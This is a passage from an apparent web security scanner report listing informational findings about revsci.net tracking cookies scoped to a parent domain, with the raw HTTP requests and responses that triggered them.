2CXK54Y120ggsATec3mULe33CQI8vGt4zAbzaZcYC/lFrFCED0rD5EJ/zjoe78vSR0ryqw0Zf34JytsCTbsmD8D2hfTDhkiMNu/wQtKiKfMWgM3Du2pA6s1xl63lOviGs1qxpELFL/WHmVSObK/KmjV6g5L6Xn8jMa4C4NHlHkE7CUy7PmbwYue/iRiPmR6S1ELt/+xEp+0Ufax03GSmLvQFwh1xC3xbWl+HyjuF1ACF4bOI2POlNY8vDbwCqFg0bgp4COiMDirtE6dXdu/WIqQhKP0hqjoTCfOi1qNMAf6JRrmRtyS5tC4RD/jw4JSD3ddVqC1sR2BVIQmEBxeYEzWUnTCmp639ytnMeOXnDv/5agPp8MZIFDBKWEkzmXnSb5MXC8DOLj3y+/wRw6dHbXFs8GOJFLkv+xoIaWPZk+qqTOHtue/DVGvE74n+jb/2QkO7OyrMCOFSpkDQ+5V0l3svrNph+YsCo0EYLZioS/QUOdw2NWR29viUaewyFzkAaX6q6VHXcMEbDMSkMdZDm4lNRIj8ZJZa4x2XeC7b8A7Afsb98UttyFh9N+94n5XVStnOIJHAiWyGkXi1MCZ4X4Y4M9mL/tvfnmmQiE9A/B5F5tK+StSu9EqgTsFfg7wnHsS5lN7ANxVfkD54qye6zUVRR4m7t4geTfYLhj/eSAp+WvFLjHMFGSCFxGyYU//VdIqO0ybF/TkOBAq5/YFbDWGLsZU23/UPymQvP60s5tIDBqzsEKXx5q5tOWN3xo32rGSFQVQtNim7CbhR8dX05UqQqCFWZ/9ja4z388/+IiuuP2ld6sBhkl4QIKuzEKD0CxcldXbNeThqVdia+3QaaNwBByH5skVxaV16qXzeDqxLaUQZOWONzEYL96zeDQX4SzNB+jvaAuV0lhhKFVQ2CS4T0iS3nDzCTxHpPHxiqN5h3Sdw4r1F5dhCdf6NiKtQlyHPzAqE4KetJPB/rPbDKqv2Cdal"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzPsfMoDyEru/fEoGzjWn34t0UXd2brjobvtLMxEgZPYynL092BGNmJfu3ZKbDYVWgROkpogd5m2UVZhuiFqnW41Y23J+N639Yk0FAXcAE73YN7Dql57uFYGqtbyoEYwmQ3qLbPZNP4YaLCsBTx+G71IdHayTwUxZXRxphSE7z0Oh+32W1M/mAvayqLMqWypL5ig0WyH8hIkdiJtoEA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd75eIrx12q53Y2j8zDjGQ0zaGKg0beJVdN909hLW6U3SszoJ4UGSJUJwBNuyrIiZbbb05W2rfLwB6MSKTAxJlDB6k7hioicEEcjKP6DDXwgyzvy3zXjb9F8xod4AH+mu28DlOp3pWURvqQeuQD++EpJt8z2EVRz4KiLXeBbx4qcJhuo2tdDVDn1cvt8UNM8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:20:09 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:20:09 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.192. http://pix04.revsci.net/I10985/b3/0/3/1008211/783069022.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/783069022.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iLS00ItR9yFTE/YWVXwG8UEUWKH12XbyUc8QPYIV82GNbI6JzmHpkCVsOMUVWjFxmH17ALs7UHM40i6gFlt3Z9BCO8ZJpO/3SGtyu10WXcya4FXkwkzaDZAeo1iJd9HThKNt7rts7BnIcclhhpqzjUEmGqm7YiZYggM4wIytbEwdmrXllsUXty6F1Rx29F0jBOLDdfT5l9FRKZIy4pNiDNePEa4Xej9Wo9+rBfbSVBIaVeEx5zEJoHcDTeRVc03kpUc1J292q/07; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:38:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/783069022.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_c6cR="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1T5naB64mAw0+Om2ozfWioJheIF3JkOfZ3v4x1sIAzWnsKdaJpq/vgUhiARInCNcghgKhJjvAKjv19bXY2VOe9PIcfFRS2P6RUqSEB0TCrYF8Mwl5Ft4iss5u2Pcc24RCO28mftq9UB5M02sooXw6VI84Pi8axHcqIEYGldFPrE1/Z8zZqhYZ407c/sYBjhfFhzyiSgItmpREc0b1AjTHG82FXu+NhjH5ELDMGw2niS9NjWuxuNNThvUUHibAPdO32POnUEyZCEgEbwu0uQUOIOcQSHnPs/OHMDLP7f+eAaIXLeltJmGuR5ZNCXvqYASPi8r3JALRmV27mR0MRuYDBqA9q8UCU5CBMms8Xv5k0psvyw8IsU0hyBPCInG73En59o8HCIugz35UaOBqer61/zxe/Ecn5yFgP36Jl9ztEc68ubHhEyDenWAQISOEvvrr+JDX94TOW52h7EZrZ4Chhelx1LS70fzvwzBGcitrba7abr6bHP/k1o8ZeZna42raszL+MtCjF1f01GKdzachQsMdhFwgkHY6VP/X3xt/4H6OF0qCjMt01appdcWoavwZ7EdDgT2FWtAdtVAkHtaNJRhVLSMfyD6KRyYTOsQGCIyb1q/GhRFQSRoG9PrnagXhg70vMcJvPvQ64xgSPZkiHN1umndv8e0BC+YAnF06aXwmKAgq/0DCl4p4zWWDVkx+Na4RyED6XDBPeaGHuTmqlm/2uL8s6YWf/FnNOjeGOQG4EiA3SYx3rNsMjwsvGaej2PGkar4STgFvoIoxSSOi7A/4O35nXxOZsUxrMzXkMqM4En8rhoWjDTM7KAv42VUP82pBmxbEz+mZ4xlvd3QQO5witxhyhxeP7JyT5JL1IDDctLTqO+tGo5TLMUw/TdkGl3cqNy4s2HYySu+3Jx4q98mjgU3w0STDgUlZHxTU1BnVS0Uy09CQdtXtogRhIKELESQDJUNPAdmFH5F/HhMPhCPfh1J/rSpc5Qtr5Ut+0e7FKwflVYaVNfTJENwQETJ6lRuL4N3oXheRyLeJFC/LuQhQ/LbtzQvpZ6wZY4Lv73s5Thvev8BiSdaOQkRsBP3GbXVkxSogq86lXe0N4NLeqoebgovNME11suzb+Wz0GMyowZkQgsAo8Ksxs40vCKx9c/5+lgcTu+tnCfXC+NT3OBAqBSX05QcoAdPa1RVbSLwW3hJxsBqxGLaQvUbv/TDc/HxnWDCbrIhrDDbKtmmk6zYvEk3v7rv1EcFuPLdc+LjRq2eSrwkQeNODgRBKjTlm5+oTfqA8/C1R56wB660FQTC3btRMwszh94BZFirKVlSKQLQwu14o="; rsi_us_1000000="pUMN4y+jOBYULQE0ur9TT2hzHlCu5XJb+xXy69xbJ/0QxWTt51Hu4oXEeShVJYQjG1R1o5/G0paczautuuvzINslSaKKkMahrYKMVCh7aijX2a48uESz2iJdlSNkxSTqpWV9haIjspP5ypK/QvJYkOcP+SPHjcUiZrws1h7nQH6FdL1FQIES/0frzwqVQHQSc2d/av0VrZhYBqD9z4If1kE1mZso9RdTw8Mle0K7by+oB0pu3RhAIuCsoP0gnR7ZVq8L/vGqtaxs4B89n1WSlI2+T8Lfog1uUjwOObXnECjU05E2MBqbloWQh12TtRVwmLBQUbVijczC8vsp5B17nsCy4jBwF06ljgZB1iJIqLswHKC81UJAly5Hq1kFo3jfmFSpLhQqZNVqGF1QK9hQb+C2FJmANt9y5A/8Tj1owYo82OH58P9eCPN/1ZIiei/eedDVo3KVNZv/U2aY99q6CsDC/pZrlvjfxTetb/w/aSx0RSHtLdGq5ufPwSXRbH+tcYPF5cToooOhuyiKeRg6X4tkQHq1v+jSQW5bKrn4qfIwnmvRNfEyUC9CiWktMbBGk4RG3xji0mfO1y8uFrLC2Ozr0T8pDEKNAd/JYi0jT9LCnw8Ncps3mzzAreMkOgXb+HdaZGoLvVQf0fq+MZfo7NT9g3Dl9M5sJchbNSu/BZU7mfQOVFKXyn5UPiEQil4MxzIMbM92R0GAKzxJKHIx3HmOVpuitlXc9cp9FsqrdUy82jIfaQC1/9ooHhWEVf2PTAx5WEI/U8RfzllLKAyLuhwASpBXA1o/p/3Ega4LohgP1df8JdwXG7LOlHU38YxsqaLGYftvCYeD79JxgxDonVVBqSh9+vJvtGZA/v87sCIQLOtsTRP5OOf262h+6LI+3mVIhrxpyd8BIB6ayUaIMOHUNY+DzrLAFa1hjwn7vmIEFrrCgFiOBohn4BO5D7Djc1mVfCKfoS0pfpmwkItiVRXF7FNDZybsmf5SsOmuursm4tNHCkrjrdaqtESmsX5YG94BsdwJd4KvQDQrDY+GeEp2OyKTUsAFWrUqGkDBRMnWeIjj9H4yqfPcNj6qBnkyb8UKeiP7uKf4Bu+3WngxYdTLdRQkGKVux6EE0cp2MopsjES+hoKVMfQsXLafJ/ymMa+dUwQefkP82FZP7QgVDU01v930/OLwu0rgsPS5NAO3no1khQZN3GjLhdgK/u8F5y53ZoPLqxiaCp8Chc1BnyXAFH+3lwniLXsWiDa/gPR9HX2yM9hSesJnZ2EVlkqPc9IzsBApeiC+aD2qdDbwNxzu9BFghyaJ2PpD6llPTcViEXWGivBdNLDQtytkC03EjHqj5xoTihpui1C3/LI3IIZ0CxpOsH4M17GhQMDpLWByamiJYfi1MCZ4X9ZBboyud1tVjHQgiI9H/BpF5tKOyhWh9MigTdG/nUCnXsSpm6TY61JfgUVLpxxFagtonbsvLHMSLfoIhqdgdcTdqA/BsZizgTO+1vGz46zcfMoYfRj0FUg7qBiPqf1hiF9YjDOnrIz5P9uggoO5nSnxu0fSjQ85bsnG6Er920l4UfjGRJy1xygL6VZ7uv7zFmBIM4ojTUgdW7sJFSOAy7w0+FwCmC8jkq7V4gPjZUW2dt3hJ/jyziUxDQTaMXm1V0MF35gUAA26/LpbFMansIci4UUZMWONzEYL9qzeDTX4S3NJ9DvuIFNmvYtQXp4QGrM1d8zvugoTlwtpaB7OJxfo6/E87HD5sofEKMkgfkN5o+FjmnT/9FtdyTvOyBJzJo9f7tYX"; rsi_segs_1000000=pUPFJE+hOHMQlvUbea77QLtK7hVkaohbRCRMRygpLT3k86fOUlIPyGpQqGmcAHhFlCRHTDSdoCOkICT9ADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbboeq91vrEp6PLPFjL00+eBC86WjLf8zGKgiUktukxMj4LRehj1yYj7ERKG9rVwikIXF3ugQAuVODfRw3cSQz3lezvtsbXoiiyRss4WB/MghJXJNvoFiS6M5I3AMtz4fUyFAst47DM5QbvQx8dd0gfaGp/gDq0bNfJT2Och3Ccye+ofAbuB0DxLD9u83gErX0udsm+0W7rRGT6BLE+GC5TtVlc1YR18nyKcmHfl5E6TTJIclgpeLAhO6fhGnlYtCiQoJrAPt9Dk534Ogzh08bP1KkrkcajJ1GA45enPmYXILccTqqZI/+RDHByJ8C269lekIPFKynhZqODufS/qVE/YXtOa3BqYedNuYDZatvOC9Hgr4e1HbCtQS5T253oyAq1j1kQB+/FNIub9qIcBf2GA71IdHayTwUxZXRxphSE7T2SD+32W1M/mAlxu59BjzK6KOekFWyH8hIkd0bFoGA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iLS00ItR9yFTE/YWVXwG8UEUWKH12XbyUc8QPYIV82GNbI6JzmHpkCVsOMUVWjFxmH17ALs7UHM40i6gFlt3Z9BCO8ZJpO/3SGtyu10WXcya4FXkwkzaDZAeo1iJd9HThKNt7rts7BnIcclhhpqzjUEmGqm7YiZYggM4wIytbEwdmrXllsUXty6F1Rx29F0jBOLDdfT5l9FRKZIy4pNiDNePEa4Xej9Wo9+rBfbSVBIaVeEx5zEJoHcDTeRVc03kpUc1J292q/07; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:38:43 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:38:43 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.193. http://pix04.revsci.net/I10985/b3/0/3/1008211/791107298.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/791107298.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjkGXQ0oLjsSKY/4HossPOTKQJnIcaZP0OG+K1TVdceBnAk0K+jW+8zO6PZVdN909hLW6U3SszoJ4UGSJUJwBNvCgtlitVpEHxH/U/nxw+K0euFsiQbwAZpCdMOuAuxLFtJvZhlg+uZFSUKB2jielQgHXzANC4gHpVkBOGa3eWiyV0SqZNVe0D3NUVKDinJAOYGfBZEDB+M9DRdyJq9bt5XnNME=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:22:15 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

